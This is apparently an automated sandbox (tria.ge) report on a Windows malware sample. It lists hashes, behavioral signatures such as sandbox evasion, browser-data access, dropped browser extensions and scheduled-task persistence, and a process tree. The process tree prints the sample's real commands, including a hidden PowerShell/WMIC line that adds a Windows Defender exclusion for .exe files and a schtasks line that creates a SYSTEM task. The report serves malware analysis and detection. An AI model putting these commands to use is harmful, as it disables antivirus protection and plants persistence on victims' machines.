Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
135s -
max time network
104s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
04/07/2024, 09:01
Static task
static1
Behavioral task
behavioral1
Sample
f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe
Resource
win10v2004-20240611-en
General
-
Target
f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe
-
Size
7.2MB
-
MD5
0639ed183f736cdc2720fbff7f0232be
-
SHA1
17c64a7299f09907c036f9a3e1495ccf24ef6088
-
SHA256
f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066
-
SHA512
89ea2950143b6cd521c1f326a21a19b5d256b975cb7193050d92306ff50a48f3b7d6fa256e934bae5724e387c36ed9a28c1bafee89b091c836d738797b526f51
-
SSDEEP
196608:91O0VLeIvAdN2mWrWNYwlNvnLnEnY1JK+Or4uvWWoNCNR0q:3OGZAD2B0YmvnLigjOEuuVINl
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 84 3716 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2812 powershell.exe 4860 powershell.EXE 2968 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation GZwQBNE.exe -
Executes dropped EXE 4 IoCs
pid Process 3984 Install.exe 620 Install.exe 3780 Install.exe 3120 GZwQBNE.exe -
Loads dropped DLL 1 IoCs
pid Process 3716 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json GZwQBNE.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json GZwQBNE.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini GZwQBNE.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE GZwQBNE.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft GZwQBNE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 GZwQBNE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA GZwQBNE.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 GZwQBNE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 GZwQBNE.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol GZwQBNE.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\dNSKkTdIqXSDC\vQAoTdP.dll GZwQBNE.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi GZwQBNE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi GZwQBNE.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak GZwQBNE.exe File created C:\Program Files (x86)\lIJEFxkNU\KCaChb.dll GZwQBNE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja GZwQBNE.exe File created C:\Program Files (x86)\lIJEFxkNU\wsYCeJd.xml GZwQBNE.exe File created C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR\hVGhfrj.xml GZwQBNE.exe File created C:\Program Files (x86)\dNSKkTdIqXSDC\lcChnGW.xml GZwQBNE.exe File created C:\Program Files (x86)\fhnTwgTKABUn\vUdLSyW.dll GZwQBNE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak GZwQBNE.exe File created C:\Program Files (x86)\LSzduEfHsNpU2\BKkCVaaClhpbD.dll GZwQBNE.exe File created C:\Program Files (x86)\LSzduEfHsNpU2\OznrbVf.xml GZwQBNE.exe File created C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR\avxTmSQ.dll GZwQBNE.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bRGikqFCffkwOXLBIB.job schtasks.exe File created C:\Windows\Tasks\NDvladDJhDVrRoudV.job schtasks.exe File created C:\Windows\Tasks\YVjRlmjtlQYvPsI.job schtasks.exe File created C:\Windows\Tasks\qOGoknXFjgYYIAZcs.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3544 3780 WerFault.exe 106 1744 620 WerFault.exe 87 3640 3120 WerFault.exe 179 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{25d8a8a1-0000-0000-0000-d01200000000}\MaxCapacity = "14116" GZwQBNE.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{25d8a8a1-0000-0000-0000-d01200000000}\NukeOnDelete = "0" GZwQBNE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket GZwQBNE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" GZwQBNE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer GZwQBNE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{25d8a8a1-0000-0000-0000-d01200000000} GZwQBNE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" GZwQBNE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936130200006024b221ea3a6910a2dc08002b30309d9d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 GZwQBNE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4640 schtasks.exe 1496 schtasks.exe 3224 schtasks.exe 3156 schtasks.exe 3124 schtasks.exe 4032 schtasks.exe 2220 schtasks.exe 4780 schtasks.exe 3860 schtasks.exe 3040 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2812 powershell.exe 2812 powershell.exe 3860 powershell.exe 3860 powershell.exe 4240 powershell.exe 4240 powershell.exe 4860 powershell.EXE 4860 powershell.EXE 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 2968 powershell.exe 2968 powershell.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe 3120 GZwQBNE.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2812 powershell.exe Token: SeIncreaseQuotaPrivilege 868 WMIC.exe Token: SeSecurityPrivilege 868 WMIC.exe Token: SeTakeOwnershipPrivilege 868 WMIC.exe Token: SeLoadDriverPrivilege 868 WMIC.exe Token: SeSystemProfilePrivilege 868 WMIC.exe Token: SeSystemtimePrivilege 868 WMIC.exe Token: SeProfSingleProcessPrivilege 868 WMIC.exe Token: SeIncBasePriorityPrivilege 868 WMIC.exe Token: SeCreatePagefilePrivilege 868 WMIC.exe Token: SeBackupPrivilege 868 WMIC.exe Token: SeRestorePrivilege 868 WMIC.exe Token: SeShutdownPrivilege 868 WMIC.exe Token: SeDebugPrivilege 868 WMIC.exe Token: SeSystemEnvironmentPrivilege 868 WMIC.exe Token: SeRemoteShutdownPrivilege 868 WMIC.exe Token: SeUndockPrivilege 868 WMIC.exe Token: SeManageVolumePrivilege 868 WMIC.exe Token: 33 868 WMIC.exe Token: 34 868 WMIC.exe Token: 35 868 WMIC.exe Token: 36 868 WMIC.exe Token: SeIncreaseQuotaPrivilege 868 WMIC.exe Token: SeSecurityPrivilege 868 WMIC.exe Token: SeTakeOwnershipPrivilege 868 WMIC.exe Token: SeLoadDriverPrivilege 868 WMIC.exe Token: SeSystemProfilePrivilege 868 WMIC.exe Token: SeSystemtimePrivilege 868 WMIC.exe Token: SeProfSingleProcessPrivilege 868 WMIC.exe Token: SeIncBasePriorityPrivilege 868 WMIC.exe Token: SeCreatePagefilePrivilege 868 WMIC.exe Token: SeBackupPrivilege 868 WMIC.exe Token: SeRestorePrivilege 868 WMIC.exe Token: SeShutdownPrivilege 868 WMIC.exe Token: SeDebugPrivilege 868 WMIC.exe Token: SeSystemEnvironmentPrivilege 868 WMIC.exe Token: SeRemoteShutdownPrivilege 868 WMIC.exe Token: SeUndockPrivilege 868 WMIC.exe Token: SeManageVolumePrivilege 868 WMIC.exe Token: 33 868 WMIC.exe Token: 34 868 WMIC.exe Token: 35 868 WMIC.exe Token: 36 868 WMIC.exe Token: SeDebugPrivilege 3860 powershell.exe Token: SeDebugPrivilege 4240 powershell.exe Token: SeDebugPrivilege 4860 powershell.EXE Token: SeDebugPrivilege 2968 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4628 WMIC.exe Token: SeIncreaseQuotaPrivilege 4628 WMIC.exe Token: SeSecurityPrivilege 4628 WMIC.exe Token: SeTakeOwnershipPrivilege 4628 WMIC.exe Token: SeLoadDriverPrivilege 4628 WMIC.exe Token: SeSystemtimePrivilege 4628 WMIC.exe Token: SeBackupPrivilege 4628 WMIC.exe Token: SeRestorePrivilege 4628 WMIC.exe Token: SeShutdownPrivilege 4628 WMIC.exe Token: SeSystemEnvironmentPrivilege 4628 WMIC.exe Token: SeUndockPrivilege 4628 WMIC.exe Token: SeManageVolumePrivilege 4628 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 4628 WMIC.exe Token: SeIncreaseQuotaPrivilege 4628 WMIC.exe Token: SeSecurityPrivilege 4628 WMIC.exe Token: SeTakeOwnershipPrivilege 4628 WMIC.exe Token: SeLoadDriverPrivilege 4628 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4272 wrote to memory of 3984 4272 f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe 85 PID 4272 wrote to memory of 3984 4272 f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe 85 PID 4272 wrote to memory of 3984 4272 f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe 85 PID 3984 wrote to memory of 620 3984 Install.exe 87 PID 3984 wrote to memory of 620 3984 Install.exe 87 PID 3984 wrote to memory of 620 3984 Install.exe 87 PID 620 wrote to memory of 1716 620 Install.exe 92 PID 620 wrote to memory of 1716 620 Install.exe 92 PID 620 wrote to memory of 1716 620 Install.exe 92 PID 1716 wrote to memory of 3944 1716 forfiles.exe 94 PID 1716 wrote to memory of 3944 1716 forfiles.exe 94 PID 1716 wrote to memory of 3944 1716 forfiles.exe 94 PID 3944 wrote to memory of 2812 3944 cmd.exe 95 PID 3944 wrote to memory of 2812 3944 cmd.exe 95 PID 3944 wrote to memory of 2812 3944 cmd.exe 95 PID 2812 wrote to memory of 868 2812 powershell.exe 97 PID 2812 wrote to memory of 868 2812 powershell.exe 97 PID 2812 wrote to memory of 868 2812 powershell.exe 97 PID 620 wrote to memory of 4032 620 Install.exe 99 PID 620 wrote to memory of 4032 620 Install.exe 99 PID 620 wrote to memory of 4032 620 Install.exe 99 PID 3780 wrote to memory of 3860 3780 Install.exe 107 PID 3780 wrote to memory of 3860 3780 Install.exe 107 PID 3780 wrote to memory of 3860 3780 Install.exe 107 PID 3860 wrote to memory of 1936 3860 powershell.exe 109 PID 3860 wrote to memory of 1936 3860 powershell.exe 109 PID 3860 wrote to memory of 1936 3860 powershell.exe 109 PID 1936 wrote to memory of 2468 1936 cmd.exe 110 PID 1936 wrote to memory of 2468 1936 cmd.exe 110 PID 1936 wrote to memory of 2468 1936 cmd.exe 110 PID 3860 wrote to memory of 3128 3860 powershell.exe 111 PID 3860 wrote to memory of 3128 3860 powershell.exe 111 PID 3860 wrote to memory of 3128 3860 powershell.exe 111 PID 3860 wrote to memory of 3456 3860 powershell.exe 112 PID 3860 wrote to memory of 3456 3860 powershell.exe 112 PID 3860 wrote to memory of 3456 3860 powershell.exe 112 PID 3860 wrote to memory of 3632 3860 powershell.exe 113 PID 3860 wrote to memory of 3632 3860 powershell.exe 113 PID 3860 wrote to memory of 3632 3860 powershell.exe 113 PID 3860 wrote to memory of 4140 3860 powershell.exe 114 PID 3860 wrote to memory of 4140 3860 powershell.exe 114 PID 3860 wrote to memory of 4140 3860 powershell.exe 114 PID 3860 wrote to memory of 668 3860 powershell.exe 115 PID 3860 wrote to memory of 668 3860 powershell.exe 115 PID 3860 wrote to memory of 668 3860 powershell.exe 115 PID 3860 wrote to memory of 3900 3860 powershell.exe 116 PID 3860 wrote to memory of 3900 3860 powershell.exe 116 PID 3860 wrote to memory of 3900 3860 powershell.exe 116 PID 3860 wrote to memory of 4604 3860 powershell.exe 117 PID 3860 wrote to memory of 4604 3860 powershell.exe 117 PID 3860 wrote to memory of 4604 3860 powershell.exe 117 PID 3860 wrote to memory of 4488 3860 powershell.exe 118 PID 3860 wrote to memory of 4488 3860 powershell.exe 118 PID 3860 wrote to memory of 4488 3860 powershell.exe 118 PID 3860 wrote to memory of 4964 3860 powershell.exe 119 PID 3860 wrote to memory of 4964 3860 powershell.exe 119 PID 3860 wrote to memory of 4964 3860 powershell.exe 119 PID 3860 wrote to memory of 3112 3860 powershell.exe 120 PID 3860 wrote to memory of 3112 3860 powershell.exe 120 PID 3860 wrote to memory of 3112 3860 powershell.exe 120 PID 3860 wrote to memory of 3696 3860 powershell.exe 121 PID 3860 wrote to memory of 3696 3860 powershell.exe 121 PID 3860 wrote to memory of 3696 3860 powershell.exe 121 PID 3860 wrote to memory of 3748 3860 powershell.exe 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe"C:\Users\Admin\AppData\Local\Temp\f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Users\Admin\AppData\Local\Temp\7zS30C4.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\7zS32B8.tmp\Install.exe.\Install.exe /modidiM "385137" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:868
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRGikqFCffkwOXLBIB" /SC once /ST 09:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS32B8.tmp\Install.exe\" Fh /DHspdidbpSM 385137 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 620 -s 11324⤵
- Program crash
PID:1744
-
-
-
-
